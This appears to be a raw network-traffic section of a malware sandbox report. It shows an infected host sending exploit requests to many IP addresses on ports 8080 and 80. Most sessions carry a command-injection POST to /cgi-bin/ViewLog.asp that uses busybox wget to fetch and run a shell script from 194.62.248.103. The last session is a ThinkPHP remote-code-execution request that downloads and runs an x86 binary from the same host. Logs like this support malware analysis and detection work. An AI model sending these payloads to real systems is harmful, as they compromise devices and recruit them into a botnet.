                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.235619862.55.255.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.076730967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.385339975 CEST1203INHTTP/1.1 307 Temporary Redirect
                                                        Date: Sun, 14 Apr 2024 14:35:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 152
                                                        Connection: close
                                                        Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.233719462.61.8.568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.083239079 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:42.748119116 CEST1289INHTTP/1.1 404
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1
                                                        Set-Cookie: JSESSIONID=164D2A23A29EE0660D4A6F045F9E9DB5; Path=/; HttpOnly
                                                        Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Set-Cookie: COOKIE_SUPPORT=true; Max-Age=31536000; Expires=Mon, 14-Apr-2025 14:35:41 GMT; Path=/; HttpOnly
                                                        Set-Cookie: GUEST_LANGUAGE_ID=ru_RU; Max-Age=31536000; Expires=Mon, 14-Apr-2025 14:35:41 GMT; Path=/; HttpOnly
                                                        Liferay-Portal: Liferay Community Edition Portal 7.2.1 CE GA2 (Mueller / Build 7201 / November 12, 2019)
                                                        Content-Type: text/html;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Date: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Data Raw: 32 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6c 74 72 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d0 b0 d1 82 d1 83 d1 81 20 2d 20 d0 ad d0 ba d1 81 d0 bf d0 b5 d1 80 d1 82 d0 bd d0 b0 d1 8f 20 d0 a1 d0 b8 d1 81 d1 82 d0 b5 d0 bc d0 b0 20 d0 93 d0 98 d0 a1 20 d0 a5 d0 91 d0 91 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 2f 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 2f 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 73 65 6e 6e 61 2d 74 72 61 63 6b 3d 22 70 65 72 6d 61 6e 65 6e 74 22 20 73 72 63 3d 22 2f 63 6f 6d 62 6f 3f 62 72 6f 77 73 65 72 49 64 3d 6f 74 68 65 72 26 6d 69 6e 69 66 69 65 72 54 79 70 65 3d 6a 73 26 6c 61 6e 67 75 61 67 65 49 64 3d 72 75 5f 52 55 26 62 3d 37 32 30 31 26 74 3d
                                                        Data Ascii: 2000<!DOCTYPE html><html class="ltr" dir="ltr" lang="ru-RU"><head><title> - </title><meta content="initial-scale=1.0, width=device-width" name="viewport" /><meta content="text/html; charset=UTF-8" http-equiv="content-type" /><script data-senna-track="permanent" src="/combo?browserId=other&minifierType=js&languageId=ru_RU&b=7201&t=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.234065094.122.23.488080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.108974934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.233467294.23.228.2178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.365691900 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.654882908 CEST556INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:41 GMT
                                                        Server: Apache/2.4.25 (Debian)
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.234346095.111.217.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.390830994 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.709146976 CEST349INHTTP/1.0 500 500 Service unavailable (with message)
                                                        Date: Sun, 14 Apr 2024 14:35:41 GMT
                                                        Server: Apache/2.4.54 (Debian)
                                                        X-Powered-By: PHP/7.4.33
                                                        Cache-Control: no-cache, private
                                                        Content-Length: 74
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 54 68 65 20 77 65 62 73 69 74 65 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 62 72 20 2f 3e
                                                        Data Ascii: The website encountered an unexpected error. Please try again later.<br />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.235780231.136.233.28080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.391037941 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:42.335751057 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.255465031 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:48.159038067 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:55.837872028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:11.195734024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:43.447350025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.234486494.156.128.348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.405988932 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.733158112 CEST658INHTTP/1.1 401 Unauthorized
                                                        Access-Control-Allow-Credentials: true
                                                        Access-Control-Allow-Headers: Accept, Accept-Encoding, Authorization, Cache-Control, Content-Type, Content-Length, Origin, X-Real-IP, X-CSRF-Token
                                                        Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
                                                        Access-Control-Allow-Origin: http://94.156.128.34
                                                        Access-Control-Max-Age: 7200
                                                        Content-Type: application/json; charset=utf-8
                                                        Www-Authenticate: Bearer
                                                        X-Request-Id: 877770a2-87e3-4ade-be4b-bd11104bf71d
                                                        Date: Sun, 14 Apr 2024 14:35:41 GMT
                                                        Content-Length: 77
                                                        Connection: close
                                                        Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 54 68 65 20 72 65 71 75 69 72 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 68 65 61 64 73 20 77 65 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e 22 7d
                                                        Data Ascii: {"error":"The required authorization heads were not present in the request."}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.233560494.122.78.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.413110971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.233974494.122.19.538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.415467024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.235029294.120.172.2018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.417752028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.233662894.26.200.858080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:41.792851925 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:42.227802992 CEST259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.235441295.101.201.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.142571926 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:42.445483923 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Connection: close
